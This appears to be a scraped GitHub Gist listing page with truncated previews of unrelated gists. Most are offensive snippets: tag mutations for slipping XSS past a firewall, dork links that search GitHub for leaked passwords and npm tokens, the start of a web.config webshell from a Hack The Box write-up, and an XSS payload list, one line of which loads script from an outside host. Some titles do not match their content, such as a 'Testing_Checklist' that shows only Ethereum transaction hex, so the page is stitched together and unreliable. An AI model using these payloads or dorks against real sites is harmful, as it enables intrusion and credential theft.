A combination of my own methodology and the Web Application Hacker's Handbook Task checklist, as a Github-Flavored Markdown file
MrPurplz
hackerscrolls
/ mutation_a.txt
Last active
March 11, 2023 15:19
Mutation points in <a> tag for WAF bypass
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)"> | |
| [1] | |
| Bytes: | |
| \x09 \x0a \x0c \x0d \x20 \x2f | |
| <a/href="javascript:alert(1)"> | |
| <a\x09href="javascript:alert(1)"> | |
| [2,3] |
jhaddix
/ Github bash generated search links (from hunter.sh)
Created
January 12, 2020 19:55
Github bash generated search links (from hunter.sh)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo "" | |
| echo "************ Github Dork Links (must be logged in) *******************" | |
| echo "" | |
| echo " password" | |
| echo "https://github.com/search?q=%22$1%22+password&type=Code" | |
| echo "https://github.com/search?q=%22$without_suffix%22+password&type=Code" | |
| echo "" | |
| echo " npmrc _auth" |
Ge0rg3
/ web.config
Last active
August 9, 2019 15:27
Written for my Bounty HTB Write-up. Bodged together from other areas of the internet (most notably https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.asp & https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/).
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <configuration> | |
| <system.webServer> | |
| <handlers accessPolicy="Read, Script, Write"> | |
| <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> | |
| </handlers> | |
| <security> | |
| <requestFiltering> | |
| <fileExtensions> | |
| <remove fileExtension=".config" /> |
jhaddix
/ Testing_Checklist.md
Last active
March 9, 2024 16:18
— forked from amotmot/WAHH_Task_Checklist.md
Fast Simple Appsec Testing Checklist
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| txdata = "606060405260405160808061067283398101604090815281516020830151918301516060909301519092905b42811161003457fe5b60008054600181016100468382610100565b916000526020600020900160005b8154600160a060020a038089166101009390930a928302920219161790555060008054600181016100858382610100565b916000526020600020900160005b8154600160a060020a038088166101009390930a928302920219161790555060008054600181016100c48382610100565b916000526020600020900160005b8154600160a060020a038087166101009390930a928302920219161790555060028190555b5050505061014b565b8154818355818115116101245760008381526020902061012491810190830161012a565b5b505050565b61014891905b808211156101445760008155600101610130565b5090565b90565b6105188061015a6000396000f300606060405236156100a15763ffffffff7c0100000000000000000000000000000000000000000000000000000000600035041663120b205381146100a35780634ecb35c4146100c557806366d003ac146100f557806367e404ce146101215780636cc6cde11461014d5780637022b58e1461017957806393c0e83a1461018b578063a79a3cee146101ba578063ac4c25b2146101de578063c7fe23a3146101f057 |
nickoala
/ 0_python_email.md
Last active
February 21, 2024 14:20
Use Python to send and receive emails
Use Python to:
- send a plain text email
- send an email with attachment
- receive and filter emails according to some criteria
intrd
/ tutorial_bruteforce_cookies_csrf_burp_rewrite.txt
Last active
June 27, 2023 15:57
Tutorial - Extract session and csrf using cURL, run Hydra/Patator bruteforce over Burpsuite proxy w/ rewritting macros
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| loadedstart | |
| onabort | |
| onafterprint | |
| onanimationend | |
| onanimationiteration | |
| onanimationstart | |
| onautocomplete | |
| onautocompleteerror | |
| onbeforecopy | |
| onbeforecut |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| Generate a random IPv6 address for a specified subnet | |
| """ | |
| from random import seed, getrandbits | |
| from ipaddress import IPv6Network, IPv6Address | |
| subnet = '2001:db8:100::/64' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> |
NewerOlder